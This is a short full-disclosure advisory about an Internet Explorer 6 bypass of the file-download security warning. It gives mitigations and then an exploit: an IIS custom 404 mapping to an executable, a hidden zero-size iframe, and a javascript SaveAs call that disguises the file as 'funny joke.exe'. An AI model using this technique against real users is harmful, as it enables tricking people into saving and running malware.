Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious executable file masqueraded as a HTML file.

Secunia did not release the technical details (aka Security by Obscurity) thus we publish this page (aka Full Disclosure)

Solution

[EN] Disable Active Scripting and the "Hide file extensions for known file types" option [Tools->Folder Options->View]
[FR] Désactivez Active Scriptig et l'option "Masquer les extensions des fichiers dont le type est connu [Panneau de
configuration -> Options des dossiers -> Affichage] 


Credits : go to cyber flash


How does it work ? A.K.A Exploit

The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:

Also, here's an example that requires modifying the IIS Error Mapping Properties (see below):

Steps to configure IIS:

Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows:

1. Error Code: 404
2. Default Text: Not Found
3. Message Type: URL
4. URL: /v.exe (name of the executable)

Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so it will trigger a 404 error message as defined above. But, the javascript code below references the stealthy v.exe data within the frame 'NotFound' and is linked to 'funny joke.exe' when prompted to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');